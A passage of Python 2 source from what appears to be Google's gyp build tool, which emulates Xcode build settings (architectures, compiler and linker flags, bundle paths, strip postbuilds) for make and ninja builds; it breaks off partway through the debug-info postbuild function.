# Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ This module contains classes that help to emulate xcodebuild behavior on top of other build systems, such as make and ninja. """ import copy import gyp.common import os import os.path import re import shlex import subprocess import sys import tempfile from gyp.common import GypError # Populated lazily by XcodeVersion, for efficiency, and to fix an issue when # "xcodebuild" is called too quickly (it has been found to return incorrect # version number). XCODE_VERSION_CACHE = None # Populated lazily by GetXcodeArchsDefault, to an |XcodeArchsDefault| instance # corresponding to the installed version of Xcode. XCODE_ARCHS_DEFAULT_CACHE = None def XcodeArchsVariableMapping(archs, archs_including_64_bit=None): """Constructs a dictionary with expansion for $(ARCHS_STANDARD) variable, and optionally for $(ARCHS_STANDARD_INCLUDING_64_BIT).""" mapping = {'$(ARCHS_STANDARD)': archs} if archs_including_64_bit: mapping['$(ARCHS_STANDARD_INCLUDING_64_BIT)'] = archs_including_64_bit return mapping class XcodeArchsDefault(object): """A class to resolve ARCHS variable from xcode_settings, resolving Xcode macros and implementing filtering by VALID_ARCHS. The expansion of macros depends on the SDKROOT used ("macosx", "iphoneos", "iphonesimulator") and on the version of Xcode. """ # Match variable like $(ARCHS_STANDARD). 
variable_pattern = re.compile(r'\$\([a-zA-Z_][a-zA-Z0-9_]*\)$') def __init__(self, default, mac, iphonesimulator, iphoneos): self._default = (default,) self._archs = {'mac': mac, 'ios': iphoneos, 'iossim': iphonesimulator} def _VariableMapping(self, sdkroot): """Returns the dictionary of variable mapping depending on the SDKROOT.""" sdkroot = sdkroot.lower() if 'iphoneos' in sdkroot: return self._archs['ios'] elif 'iphonesimulator' in sdkroot: return self._archs['iossim'] else: return self._archs['mac'] def _ExpandArchs(self, archs, sdkroot): """Expands variables references in ARCHS, and remove duplicates.""" variable_mapping = self._VariableMapping(sdkroot) expanded_archs = [] for arch in archs: if self.variable_pattern.match(arch): variable = arch try: variable_expansion = variable_mapping[variable] for arch in variable_expansion: if arch not in expanded_archs: expanded_archs.append(arch) except KeyError as e: print 'Warning: Ignoring unsupported variable "%s".' % variable elif arch not in expanded_archs: expanded_archs.append(arch) return expanded_archs def ActiveArchs(self, archs, valid_archs, sdkroot): """Expands variables references in ARCHS, and filter by VALID_ARCHS if it is defined (if not set, Xcode accept any value in ARCHS, otherwise, only values present in VALID_ARCHS are kept).""" expanded_archs = self._ExpandArchs(archs or self._default, sdkroot or '') if valid_archs: filtered_archs = [] for arch in expanded_archs: if arch in valid_archs: filtered_archs.append(arch) expanded_archs = filtered_archs return expanded_archs def GetXcodeArchsDefault(): """Returns the |XcodeArchsDefault| object to use to expand ARCHS for the installed version of Xcode. The default values used by Xcode for ARCHS and the expansion of the variables depends on the version of Xcode used. For all version anterior to Xcode 5.0 or posterior to Xcode 5.1 included uses $(ARCHS_STANDARD) if ARCHS is unset, while Xcode 5.0 to 5.0.2 uses $(ARCHS_STANDARD_INCLUDING_64_BIT). 
This variable was added to Xcode 5.0 and deprecated with Xcode 5.1. For "macosx" SDKROOT, all version starting with Xcode 5.0 includes 64-bit architecture as part of $(ARCHS_STANDARD) and default to only building it. For "iphoneos" and "iphonesimulator" SDKROOT, 64-bit architectures are part of $(ARCHS_STANDARD_INCLUDING_64_BIT) from Xcode 5.0. From Xcode 5.1, they are also part of $(ARCHS_STANDARD). All thoses rules are coded in the construction of the |XcodeArchsDefault| object to use depending on the version of Xcode detected. The object is for performance reason.""" global XCODE_ARCHS_DEFAULT_CACHE if XCODE_ARCHS_DEFAULT_CACHE: return XCODE_ARCHS_DEFAULT_CACHE xcode_version, _ = XcodeVersion() if xcode_version < '0500': XCODE_ARCHS_DEFAULT_CACHE = XcodeArchsDefault( '$(ARCHS_STANDARD)', XcodeArchsVariableMapping(['i386']), XcodeArchsVariableMapping(['i386']), XcodeArchsVariableMapping(['armv7'])) elif xcode_version < '0510': XCODE_ARCHS_DEFAULT_CACHE = XcodeArchsDefault( '$(ARCHS_STANDARD_INCLUDING_64_BIT)', XcodeArchsVariableMapping(['x86_64'], ['x86_64']), XcodeArchsVariableMapping(['i386'], ['i386', 'x86_64']), XcodeArchsVariableMapping( ['armv7', 'armv7s'], ['armv7', 'armv7s', 'arm64'])) else: XCODE_ARCHS_DEFAULT_CACHE = XcodeArchsDefault( '$(ARCHS_STANDARD)', XcodeArchsVariableMapping(['x86_64'], ['x86_64']), XcodeArchsVariableMapping(['i386', 'x86_64'], ['i386', 'x86_64']), XcodeArchsVariableMapping( ['armv7', 'armv7s', 'arm64'], ['armv7', 'armv7s', 'arm64'])) return XCODE_ARCHS_DEFAULT_CACHE class XcodeSettings(object): """A class that understands the gyp 'xcode_settings' object.""" # Populated lazily by _SdkPath(). Shared by all XcodeSettings, so cached # at class-level for efficiency. _sdk_path_cache = {} _sdk_root_cache = {} # Populated lazily by GetExtraPlistItems(). Shared by all XcodeSettings, so # cached at class-level for efficiency. _plist_cache = {} # Populated lazily by GetIOSPostbuilds. 
Shared by all XcodeSettings, so # cached at class-level for efficiency. _codesigning_key_cache = {} def __init__(self, spec): self.spec = spec self.isIOS = False # Per-target 'xcode_settings' are pushed down into configs earlier by gyp. # This means self.xcode_settings[config] always contains all settings # for that config -- the per-target settings as well. Settings that are # the same for all configs are implicitly per-target settings. self.xcode_settings = {} configs = spec['configurations'] for configname, config in configs.iteritems(): self.xcode_settings[configname] = config.get('xcode_settings', {}) self._ConvertConditionalKeys(configname) if self.xcode_settings[configname].get('IPHONEOS_DEPLOYMENT_TARGET', None): self.isIOS = True # This is only non-None temporarily during the execution of some methods. self.configname = None # Used by _AdjustLibrary to match .a and .dylib entries in libraries. self.library_re = re.compile(r'^lib([^/]+)\.(a|dylib)$') def _ConvertConditionalKeys(self, configname): """Converts or warns on conditional keys. Xcode supports conditional keys, such as CODE_SIGN_IDENTITY[sdk=iphoneos*]. 
This is a partial implementation with some keys converted while the rest force a warning.""" settings = self.xcode_settings[configname] conditional_keys = [key for key in settings if key.endswith(']')] for key in conditional_keys: # If you need more, speak up at http://crbug.com/122592 if key.endswith("[sdk=iphoneos*]"): if configname.endswith("iphoneos"): new_key = key.split("[")[0] settings[new_key] = settings[key] else: print 'Warning: Conditional keys not implemented, ignoring:', \ ' '.join(conditional_keys) del settings[key] def _Settings(self): assert self.configname return self.xcode_settings[self.configname] def _Test(self, test_key, cond_key, default): return self._Settings().get(test_key, default) == cond_key def _Appendf(self, lst, test_key, format_str, default=None): if test_key in self._Settings(): lst.append(format_str % str(self._Settings()[test_key])) elif default: lst.append(format_str % str(default)) def _WarnUnimplemented(self, test_key): if test_key in self._Settings(): print 'Warning: Ignoring not yet implemented key "%s".' % test_key def IsBinaryOutputFormat(self, configname): default = "binary" if self.isIOS else "xml" format = self.xcode_settings[configname].get('INFOPLIST_OUTPUT_FORMAT', default) return format == "binary" def _IsBundle(self): return int(self.spec.get('mac_bundle', 0)) != 0 def _IsIosAppExtension(self): return int(self.spec.get('ios_app_extension', 0)) != 0 def _IsIosWatchKitExtension(self): return int(self.spec.get('ios_watchkit_extension', 0)) != 0 def _IsIosWatchApp(self): return int(self.spec.get('ios_watch_app', 0)) != 0 def GetFrameworkVersion(self): """Returns the framework version of the current target. Only valid for bundles.""" assert self._IsBundle() return self.GetPerTargetSetting('FRAMEWORK_VERSION', default='A') def GetWrapperExtension(self): """Returns the bundle extension (.app, .framework, .plugin, etc). 
Only valid for bundles.""" assert self._IsBundle() if self.spec['type'] in ('loadable_module', 'shared_library'): default_wrapper_extension = { 'loadable_module': 'bundle', 'shared_library': 'framework', }[self.spec['type']] wrapper_extension = self.GetPerTargetSetting( 'WRAPPER_EXTENSION', default=default_wrapper_extension) return '.' + self.spec.get('product_extension', wrapper_extension) elif self.spec['type'] == 'executable': if self._IsIosAppExtension() or self._IsIosWatchKitExtension(): return '.' + self.spec.get('product_extension', 'appex') else: return '.' + self.spec.get('product_extension', 'app') else: assert False, "Don't know extension for '%s', target '%s'" % ( self.spec['type'], self.spec['target_name']) def GetProductName(self): """Returns PRODUCT_NAME.""" return self.spec.get('product_name', self.spec['target_name']) def GetFullProductName(self): """Returns FULL_PRODUCT_NAME.""" if self._IsBundle(): return self.GetWrapperName() else: return self._GetStandaloneBinaryPath() def GetWrapperName(self): """Returns the directory name of the bundle represented by this target. Only valid for bundles.""" assert self._IsBundle() return self.GetProductName() + self.GetWrapperExtension() def GetBundleContentsFolderPath(self): """Returns the qualified path to the bundle's contents folder. E.g. Chromium.app/Contents or Foo.bundle/Versions/A. Only valid for bundles.""" if self.isIOS: return self.GetWrapperName() assert self._IsBundle() if self.spec['type'] == 'shared_library': return os.path.join( self.GetWrapperName(), 'Versions', self.GetFrameworkVersion()) else: # loadable_modules have a 'Contents' folder like executables. return os.path.join(self.GetWrapperName(), 'Contents') def GetBundleResourceFolder(self): """Returns the qualified path to the bundle's resource folder. E.g. Chromium.app/Contents/Resources. 
Only valid for bundles.""" assert self._IsBundle() if self.isIOS: return self.GetBundleContentsFolderPath() return os.path.join(self.GetBundleContentsFolderPath(), 'Resources') def GetBundlePlistPath(self): """Returns the qualified path to the bundle's plist file. E.g. Chromium.app/Contents/Info.plist. Only valid for bundles.""" assert self._IsBundle() if self.spec['type'] in ('executable', 'loadable_module'): return os.path.join(self.GetBundleContentsFolderPath(), 'Info.plist') else: return os.path.join(self.GetBundleContentsFolderPath(), 'Resources', 'Info.plist') def GetProductType(self): """Returns the PRODUCT_TYPE of this target.""" if self._IsIosAppExtension(): assert self._IsBundle(), ('ios_app_extension flag requires mac_bundle ' '(target %s)' % self.spec['target_name']) return 'com.apple.product-type.app-extension' if self._IsIosWatchKitExtension(): assert self._IsBundle(), ('ios_watchkit_extension flag requires ' 'mac_bundle (target %s)' % self.spec['target_name']) return 'com.apple.product-type.watchkit-extension' if self._IsIosWatchApp(): assert self._IsBundle(), ('ios_watch_app flag requires mac_bundle ' '(target %s)' % self.spec['target_name']) return 'com.apple.product-type.application.watchapp' if self._IsBundle(): return { 'executable': 'com.apple.product-type.application', 'loadable_module': 'com.apple.product-type.bundle', 'shared_library': 'com.apple.product-type.framework', }[self.spec['type']] else: return { 'executable': 'com.apple.product-type.tool', 'loadable_module': 'com.apple.product-type.library.dynamic', 'shared_library': 'com.apple.product-type.library.dynamic', 'static_library': 'com.apple.product-type.library.static', }[self.spec['type']] def GetMachOType(self): """Returns the MACH_O_TYPE of this target.""" # Weird, but matches Xcode. 
if not self._IsBundle() and self.spec['type'] == 'executable': return '' return { 'executable': 'mh_execute', 'static_library': 'staticlib', 'shared_library': 'mh_dylib', 'loadable_module': 'mh_bundle', }[self.spec['type']] def _GetBundleBinaryPath(self): """Returns the name of the bundle binary of by this target. E.g. Chromium.app/Contents/MacOS/Chromium. Only valid for bundles.""" assert self._IsBundle() if self.spec['type'] in ('shared_library') or self.isIOS: path = self.GetBundleContentsFolderPath() elif self.spec['type'] in ('executable', 'loadable_module'): path = os.path.join(self.GetBundleContentsFolderPath(), 'MacOS') return os.path.join(path, self.GetExecutableName()) def _GetStandaloneExecutableSuffix(self): if 'product_extension' in self.spec: return '.' + self.spec['product_extension'] return { 'executable': '', 'static_library': '.a', 'shared_library': '.dylib', 'loadable_module': '.so', }[self.spec['type']] def _GetStandaloneExecutablePrefix(self): return self.spec.get('product_prefix', { 'executable': '', 'static_library': 'lib', 'shared_library': 'lib', # Non-bundled loadable_modules are called foo.so for some reason # (that is, .so and no prefix) with the xcode build -- match that. 'loadable_module': '', }[self.spec['type']]) def _GetStandaloneBinaryPath(self): """Returns the name of the non-bundle binary represented by this target. E.g. hello_world. 
Only valid for non-bundles.""" assert not self._IsBundle() assert self.spec['type'] in ( 'executable', 'shared_library', 'static_library', 'loadable_module'), ( 'Unexpected type %s' % self.spec['type']) target = self.spec['target_name'] if self.spec['type'] == 'static_library': if target[:3] == 'lib': target = target[3:] elif self.spec['type'] in ('loadable_module', 'shared_library'): if target[:3] == 'lib': target = target[3:] target_prefix = self._GetStandaloneExecutablePrefix() target = self.spec.get('product_name', target) target_ext = self._GetStandaloneExecutableSuffix() return target_prefix + target + target_ext def GetExecutableName(self): """Returns the executable name of the bundle represented by this target. E.g. Chromium.""" if self._IsBundle(): return self.spec.get('product_name', self.spec['target_name']) else: return self._GetStandaloneBinaryPath() def GetExecutablePath(self): """Returns the directory name of the bundle represented by this target. E.g. Chromium.app/Contents/MacOS/Chromium.""" if self._IsBundle(): return self._GetBundleBinaryPath() else: return self._GetStandaloneBinaryPath() def GetActiveArchs(self, configname): """Returns the architectures this target should be built for.""" config_settings = self.xcode_settings[configname] xcode_archs_default = GetXcodeArchsDefault() return xcode_archs_default.ActiveArchs( config_settings.get('ARCHS'), config_settings.get('VALID_ARCHS'), config_settings.get('SDKROOT')) def _GetSdkVersionInfoItem(self, sdk, infoitem): # xcodebuild requires Xcode and can't run on Command Line Tools-only # systems from 10.7 onward. # Since the CLT has no SDK paths anyway, returning None is the # most sensible route and should still do the right thing. 
try: return GetStdout(['xcodebuild', '-version', '-sdk', sdk, infoitem]) except: pass def _SdkRoot(self, configname): if configname is None: configname = self.configname return self.GetPerConfigSetting('SDKROOT', configname, default='') def _SdkPath(self, configname=None): sdk_root = self._SdkRoot(configname) if sdk_root.startswith('/'): return sdk_root return self._XcodeSdkPath(sdk_root) def _XcodeSdkPath(self, sdk_root): if sdk_root not in XcodeSettings._sdk_path_cache: sdk_path = self._GetSdkVersionInfoItem(sdk_root, 'Path') XcodeSettings._sdk_path_cache[sdk_root] = sdk_path if sdk_root: XcodeSettings._sdk_root_cache[sdk_path] = sdk_root return XcodeSettings._sdk_path_cache[sdk_root] def _AppendPlatformVersionMinFlags(self, lst): self._Appendf(lst, 'MACOSX_DEPLOYMENT_TARGET', '-mmacosx-version-min=%s') if 'IPHONEOS_DEPLOYMENT_TARGET' in self._Settings(): # TODO: Implement this better? sdk_path_basename = os.path.basename(self._SdkPath()) if sdk_path_basename.lower().startswith('iphonesimulator'): self._Appendf(lst, 'IPHONEOS_DEPLOYMENT_TARGET', '-mios-simulator-version-min=%s') else: self._Appendf(lst, 'IPHONEOS_DEPLOYMENT_TARGET', '-miphoneos-version-min=%s') def GetCflags(self, configname, arch=None): """Returns flags that need to be added to .c, .cc, .m, and .mm compilations.""" # This functions (and the similar ones below) do not offer complete # emulation of all xcode_settings keys. They're implemented on demand. 
self.configname = configname cflags = [] sdk_root = self._SdkPath() if 'SDKROOT' in self._Settings() and sdk_root: cflags.append('-isysroot %s' % sdk_root) if self._Test('CLANG_WARN_CONSTANT_CONVERSION', 'YES', default='NO'): cflags.append('-Wconstant-conversion') if self._Test('GCC_CHAR_IS_UNSIGNED_CHAR', 'YES', default='NO'): cflags.append('-funsigned-char') if self._Test('GCC_CW_ASM_SYNTAX', 'YES', default='YES'): cflags.append('-fasm-blocks') if 'GCC_DYNAMIC_NO_PIC' in self._Settings(): if self._Settings()['GCC_DYNAMIC_NO_PIC'] == 'YES': cflags.append('-mdynamic-no-pic') else: pass # TODO: In this case, it depends on the target. xcode passes # mdynamic-no-pic by default for executable and possibly static lib # according to mento if self._Test('GCC_ENABLE_PASCAL_STRINGS', 'YES', default='YES'): cflags.append('-mpascal-strings') self._Appendf(cflags, 'GCC_OPTIMIZATION_LEVEL', '-O%s', default='s') if self._Test('GCC_GENERATE_DEBUGGING_SYMBOLS', 'YES', default='YES'): dbg_format = self._Settings().get('DEBUG_INFORMATION_FORMAT', 'dwarf') if dbg_format == 'dwarf': cflags.append('-gdwarf-2') elif dbg_format == 'stabs': raise NotImplementedError('stabs debug format is not supported yet.') elif dbg_format == 'dwarf-with-dsym': cflags.append('-gdwarf-2') else: raise NotImplementedError('Unknown debug format %s' % dbg_format) if self._Settings().get('GCC_STRICT_ALIASING') == 'YES': cflags.append('-fstrict-aliasing') elif self._Settings().get('GCC_STRICT_ALIASING') == 'NO': cflags.append('-fno-strict-aliasing') if self._Test('GCC_SYMBOLS_PRIVATE_EXTERN', 'YES', default='NO'): cflags.append('-fvisibility=hidden') if self._Test('GCC_TREAT_WARNINGS_AS_ERRORS', 'YES', default='NO'): cflags.append('-Werror') if self._Test('GCC_WARN_ABOUT_MISSING_NEWLINE', 'YES', default='NO'): cflags.append('-Wnewline-eof') # In Xcode, this is only activated when GCC_COMPILER_VERSION is clang or # llvm-gcc. 
It also requires a fairly recent libtool, and # if the system clang isn't used, DYLD_LIBRARY_PATH needs to contain the # path to the libLTO.dylib that matches the used clang. if self._Test('LLVM_LTO', 'YES', default='NO'): cflags.append('-flto') self._AppendPlatformVersionMinFlags(cflags) # TODO: if self._Test('COPY_PHASE_STRIP', 'YES', default='NO'): self._WarnUnimplemented('COPY_PHASE_STRIP') self._WarnUnimplemented('GCC_DEBUGGING_SYMBOLS') self._WarnUnimplemented('GCC_ENABLE_OBJC_EXCEPTIONS') # TODO: This is exported correctly, but assigning to it is not supported. self._WarnUnimplemented('MACH_O_TYPE') self._WarnUnimplemented('PRODUCT_TYPE') if arch is not None: archs = [arch] else: assert self.configname archs = self.GetActiveArchs(self.configname) if len(archs) != 1: # TODO: Supporting fat binaries will be annoying. self._WarnUnimplemented('ARCHS') archs = ['i386'] cflags.append('-arch ' + archs[0]) if archs[0] in ('i386', 'x86_64'): if self._Test('GCC_ENABLE_SSE3_EXTENSIONS', 'YES', default='NO'): cflags.append('-msse3') if self._Test('GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS', 'YES', default='NO'): cflags.append('-mssse3') # Note 3rd 's'. 
if self._Test('GCC_ENABLE_SSE41_EXTENSIONS', 'YES', default='NO'): cflags.append('-msse4.1') if self._Test('GCC_ENABLE_SSE42_EXTENSIONS', 'YES', default='NO'): cflags.append('-msse4.2') cflags += self._Settings().get('WARNING_CFLAGS', []) if sdk_root: framework_root = sdk_root else: framework_root = '' config = self.spec['configurations'][self.configname] framework_dirs = config.get('mac_framework_dirs', []) for directory in framework_dirs: cflags.append('-F' + directory.replace('$(SDKROOT)', framework_root)) self.configname = None return cflags def GetCflagsC(self, configname): """Returns flags that need to be added to .c, and .m compilations.""" self.configname = configname cflags_c = [] if self._Settings().get('GCC_C_LANGUAGE_STANDARD', '') == 'ansi': cflags_c.append('-ansi') else: self._Appendf(cflags_c, 'GCC_C_LANGUAGE_STANDARD', '-std=%s') cflags_c += self._Settings().get('OTHER_CFLAGS', []) self.configname = None return cflags_c def GetCflagsCC(self, configname): """Returns flags that need to be added to .cc, and .mm compilations.""" self.configname = configname cflags_cc = [] clang_cxx_language_standard = self._Settings().get( 'CLANG_CXX_LANGUAGE_STANDARD') # Note: Don't make c++0x to c++11 so that c++0x can be used with older # clangs that don't understand c++11 yet (like Xcode 4.2's). if clang_cxx_language_standard: cflags_cc.append('-std=%s' % clang_cxx_language_standard) self._Appendf(cflags_cc, 'CLANG_CXX_LIBRARY', '-stdlib=%s') if self._Test('GCC_ENABLE_CPP_RTTI', 'NO', default='YES'): cflags_cc.append('-fno-rtti') if self._Test('GCC_ENABLE_CPP_EXCEPTIONS', 'NO', default='YES'): cflags_cc.append('-fno-exceptions') if self._Test('GCC_INLINES_ARE_PRIVATE_EXTERN', 'YES', default='NO'): cflags_cc.append('-fvisibility-inlines-hidden') if self._Test('GCC_THREADSAFE_STATICS', 'NO', default='YES'): cflags_cc.append('-fno-threadsafe-statics') # Note: This flag is a no-op for clang, it only has an effect for gcc. 
if self._Test('GCC_WARN_ABOUT_INVALID_OFFSETOF_MACRO', 'NO', default='YES'): cflags_cc.append('-Wno-invalid-offsetof') other_ccflags = [] for flag in self._Settings().get('OTHER_CPLUSPLUSFLAGS', ['$(inherited)']): # TODO: More general variable expansion. Missing in many other places too. if flag in ('$inherited', '$(inherited)', '${inherited}'): flag = '$OTHER_CFLAGS' if flag in ('$OTHER_CFLAGS', '$(OTHER_CFLAGS)', '${OTHER_CFLAGS}'): other_ccflags += self._Settings().get('OTHER_CFLAGS', []) else: other_ccflags.append(flag) cflags_cc += other_ccflags self.configname = None return cflags_cc def _AddObjectiveCGarbageCollectionFlags(self, flags): gc_policy = self._Settings().get('GCC_ENABLE_OBJC_GC', 'unsupported') if gc_policy == 'supported': flags.append('-fobjc-gc') elif gc_policy == 'required': flags.append('-fobjc-gc-only') def _AddObjectiveCARCFlags(self, flags): if self._Test('CLANG_ENABLE_OBJC_ARC', 'YES', default='NO'): flags.append('-fobjc-arc') def _AddObjectiveCMissingPropertySynthesisFlags(self, flags): if self._Test('CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS', 'YES', default='NO'): flags.append('-Wobjc-missing-property-synthesis') def GetCflagsObjC(self, configname): """Returns flags that need to be added to .m compilations.""" self.configname = configname cflags_objc = [] self._AddObjectiveCGarbageCollectionFlags(cflags_objc) self._AddObjectiveCARCFlags(cflags_objc) self._AddObjectiveCMissingPropertySynthesisFlags(cflags_objc) self.configname = None return cflags_objc def GetCflagsObjCC(self, configname): """Returns flags that need to be added to .mm compilations.""" self.configname = configname cflags_objcc = [] self._AddObjectiveCGarbageCollectionFlags(cflags_objcc) self._AddObjectiveCARCFlags(cflags_objcc) self._AddObjectiveCMissingPropertySynthesisFlags(cflags_objcc) if self._Test('GCC_OBJC_CALL_CXX_CDTORS', 'YES', default='NO'): cflags_objcc.append('-fobjc-call-cxx-cdtors') self.configname = None return cflags_objcc def GetInstallNameBase(self): 
"""Return DYLIB_INSTALL_NAME_BASE for this target.""" # Xcode sets this for shared_libraries, and for nonbundled loadable_modules. if (self.spec['type'] != 'shared_library' and (self.spec['type'] != 'loadable_module' or self._IsBundle())): return None install_base = self.GetPerTargetSetting( 'DYLIB_INSTALL_NAME_BASE', default='/Library/Frameworks' if self._IsBundle() else '/usr/local/lib') return install_base def _StandardizePath(self, path): """Do :standardizepath processing for path.""" # I'm not quite sure what :standardizepath does. Just call normpath(), # but don't let @executable_path/../foo collapse to foo. if '/' in path: prefix, rest = '', path if path.startswith('@'): prefix, rest = path.split('/', 1) rest = os.path.normpath(rest) # :standardizepath path = os.path.join(prefix, rest) return path def GetInstallName(self): """Return LD_DYLIB_INSTALL_NAME for this target.""" # Xcode sets this for shared_libraries, and for nonbundled loadable_modules. if (self.spec['type'] != 'shared_library' and (self.spec['type'] != 'loadable_module' or self._IsBundle())): return None default_install_name = \ '$(DYLIB_INSTALL_NAME_BASE:standardizepath)/$(EXECUTABLE_PATH)' install_name = self.GetPerTargetSetting( 'LD_DYLIB_INSTALL_NAME', default=default_install_name) # Hardcode support for the variables used in chromium for now, to # unblock people using the make build. if '$' in install_name: assert install_name in ('$(DYLIB_INSTALL_NAME_BASE:standardizepath)/' '$(WRAPPER_NAME)/$(PRODUCT_NAME)', default_install_name), ( 'Variables in LD_DYLIB_INSTALL_NAME are not generally supported ' 'yet in target \'%s\' (got \'%s\')' % (self.spec['target_name'], install_name)) install_name = install_name.replace( '$(DYLIB_INSTALL_NAME_BASE:standardizepath)', self._StandardizePath(self.GetInstallNameBase())) if self._IsBundle(): # These are only valid for bundles, hence the |if|. 
install_name = install_name.replace( '$(WRAPPER_NAME)', self.GetWrapperName()) install_name = install_name.replace( '$(PRODUCT_NAME)', self.GetProductName()) else: assert '$(WRAPPER_NAME)' not in install_name assert '$(PRODUCT_NAME)' not in install_name install_name = install_name.replace( '$(EXECUTABLE_PATH)', self.GetExecutablePath()) return install_name def _MapLinkerFlagFilename(self, ldflag, gyp_to_build_path): """Checks if ldflag contains a filename and if so remaps it from gyp-directory-relative to build-directory-relative.""" # This list is expanded on demand. # They get matched as: # -exported_symbols_list file # -Wl,exported_symbols_list file # -Wl,exported_symbols_list,file LINKER_FILE = r'(\S+)' WORD = r'\S+' linker_flags = [ ['-exported_symbols_list', LINKER_FILE], # Needed for NaCl. ['-unexported_symbols_list', LINKER_FILE], ['-reexported_symbols_list', LINKER_FILE], ['-sectcreate', WORD, WORD, LINKER_FILE], # Needed for remoting. ] for flag_pattern in linker_flags: regex = re.compile('(?:-Wl,)?' + '[ ,]'.join(flag_pattern)) m = regex.match(ldflag) if m: ldflag = ldflag[:m.start(1)] + gyp_to_build_path(m.group(1)) + \ ldflag[m.end(1):] # Required for ffmpeg (no idea why they don't use LIBRARY_SEARCH_PATHS, # TODO(thakis): Update ffmpeg.gyp): if ldflag.startswith('-L'): ldflag = '-L' + gyp_to_build_path(ldflag[len('-L'):]) return ldflag def GetLdflags(self, configname, product_dir, gyp_to_build_path, arch=None): """Returns flags that need to be passed to the linker. Args: configname: The name of the configuration to get ld flags for. product_dir: The directory where products such static and dynamic libraries are placed. This is added to the library search path. gyp_to_build_path: A function that converts paths relative to the current gyp file to paths relative to the build direcotry. """ self.configname = configname ldflags = [] # The xcode build is relative to a gyp file's directory, and OTHER_LDFLAGS # can contain entries that depend on this. 
Explicitly absolutify these. for ldflag in self._Settings().get('OTHER_LDFLAGS', []): ldflags.append(self._MapLinkerFlagFilename(ldflag, gyp_to_build_path)) if self._Test('DEAD_CODE_STRIPPING', 'YES', default='NO'): ldflags.append('-Wl,-dead_strip') if self._Test('PREBINDING', 'YES', default='NO'): ldflags.append('-Wl,-prebind') self._Appendf( ldflags, 'DYLIB_COMPATIBILITY_VERSION', '-compatibility_version %s') self._Appendf( ldflags, 'DYLIB_CURRENT_VERSION', '-current_version %s') self._AppendPlatformVersionMinFlags(ldflags) if 'SDKROOT' in self._Settings() and self._SdkPath(): ldflags.append('-isysroot ' + self._SdkPath()) for library_path in self._Settings().get('LIBRARY_SEARCH_PATHS', []): ldflags.append('-L' + gyp_to_build_path(library_path)) if 'ORDER_FILE' in self._Settings(): ldflags.append('-Wl,-order_file ' + '-Wl,' + gyp_to_build_path( self._Settings()['ORDER_FILE'])) if arch is not None: archs = [arch] else: assert self.configname archs = self.GetActiveArchs(self.configname) if len(archs) != 1: # TODO: Supporting fat binaries will be annoying. self._WarnUnimplemented('ARCHS') archs = ['i386'] ldflags.append('-arch ' + archs[0]) # Xcode adds the product directory by default. ldflags.append('-L' + product_dir) install_name = self.GetInstallName() if install_name and self.spec['type'] != 'loadable_module': ldflags.append('-install_name ' + install_name.replace(' ', r'\ ')) for rpath in self._Settings().get('LD_RUNPATH_SEARCH_PATHS', []): ldflags.append('-Wl,-rpath,' + rpath) sdk_root = self._SdkPath() if not sdk_root: sdk_root = '' config = self.spec['configurations'][self.configname] framework_dirs = config.get('mac_framework_dirs', []) for directory in framework_dirs: ldflags.append('-F' + directory.replace('$(SDKROOT)', sdk_root)) is_extension = self._IsIosAppExtension() or self._IsIosWatchKitExtension() if sdk_root and is_extension: # Adds the link flags for extensions. These flags are common for all # extensions and provide loader and main function. 
# These flags reflect the compilation options used by xcode to compile # extensions. ldflags.append('-lpkstart') if XcodeVersion() < '0900': ldflags.append(sdk_root + '/System/Library/PrivateFrameworks/PlugInKit.framework/PlugInKit') ldflags.append('-fapplication-extension') ldflags.append('-Xlinker -rpath ' '-Xlinker @executable_path/../../Frameworks') self._Appendf(ldflags, 'CLANG_CXX_LIBRARY', '-stdlib=%s') self.configname = None return ldflags def GetLibtoolflags(self, configname): """Returns flags that need to be passed to the static linker. Args: configname: The name of the configuration to get ld flags for. """ self.configname = configname libtoolflags = [] for libtoolflag in self._Settings().get('OTHER_LDFLAGS', []): libtoolflags.append(libtoolflag) # TODO(thakis): ARCHS? self.configname = None return libtoolflags def GetPerTargetSettings(self): """Gets a list of all the per-target settings. This will only fetch keys whose values are the same across all configurations.""" first_pass = True result = {} for configname in sorted(self.xcode_settings.keys()): if first_pass: result = dict(self.xcode_settings[configname]) first_pass = False else: for key, value in self.xcode_settings[configname].iteritems(): if key not in result: continue elif result[key] != value: del result[key] return result def GetPerConfigSetting(self, setting, configname, default=None): if configname in self.xcode_settings: return self.xcode_settings[configname].get(setting, default) else: return self.GetPerTargetSetting(setting, default) def GetPerTargetSetting(self, setting, default=None): """Tries to get xcode_settings.setting from spec. 
Assumes that the setting has the same value in all configurations and throws otherwise.""" is_first_pass = True result = None for configname in sorted(self.xcode_settings.keys()): if is_first_pass: result = self.xcode_settings[configname].get(setting, None) is_first_pass = False else: assert result == self.xcode_settings[configname].get(setting, None), ( "Expected per-target setting for '%s', got per-config setting " "(target %s)" % (setting, self.spec['target_name'])) if result is None: return default return result def _GetStripPostbuilds(self, configname, output_binary, quiet): """Returns a list of shell commands that contain the shell commands neccessary to strip this target's binary. These should be run as postbuilds before the actual postbuilds run.""" self.configname = configname result = [] if (self._Test('DEPLOYMENT_POSTPROCESSING', 'YES', default='NO') and self._Test('STRIP_INSTALLED_PRODUCT', 'YES', default='NO')): default_strip_style = 'debugging' if self.spec['type'] == 'loadable_module' and self._IsBundle(): default_strip_style = 'non-global' elif self.spec['type'] == 'executable': default_strip_style = 'all' strip_style = self._Settings().get('STRIP_STYLE', default_strip_style) strip_flags = { 'all': '', 'non-global': '-x', 'debugging': '-S', }[strip_style] explicit_strip_flags = self._Settings().get('STRIPFLAGS', '') if explicit_strip_flags: strip_flags += ' ' + _NormalizeEnvVarReferences(explicit_strip_flags) if not quiet: result.append('echo STRIP\\(%s\\)' % self.spec['target_name']) result.append('strip %s %s' % (strip_flags, output_binary)) self.configname = None return result def _GetDebugInfoPostbuilds(self, configname, output, output_binary, quiet): """Returns a list of shell commands that contain the shell commands neccessary to massage this target's debug information. These should be run as postbuilds before the actual postbuilds run.""" self.configname = configname # For static libraries, no dSYMs are created. 
    # --- continuation of _GetDebugInfoPostbuilds (its def is above) ---
    result = []
    # dsymutil output only makes sense for DWARF-with-dSYM builds of linked
    # products; static libraries get no dSYM.
    if (self._Test('GCC_GENERATE_DEBUGGING_SYMBOLS', 'YES', default='YES') and
        self._Test(
            'DEBUG_INFORMATION_FORMAT', 'dwarf-with-dsym', default='dwarf') and
        self.spec['type'] != 'static_library'):
      if not quiet:
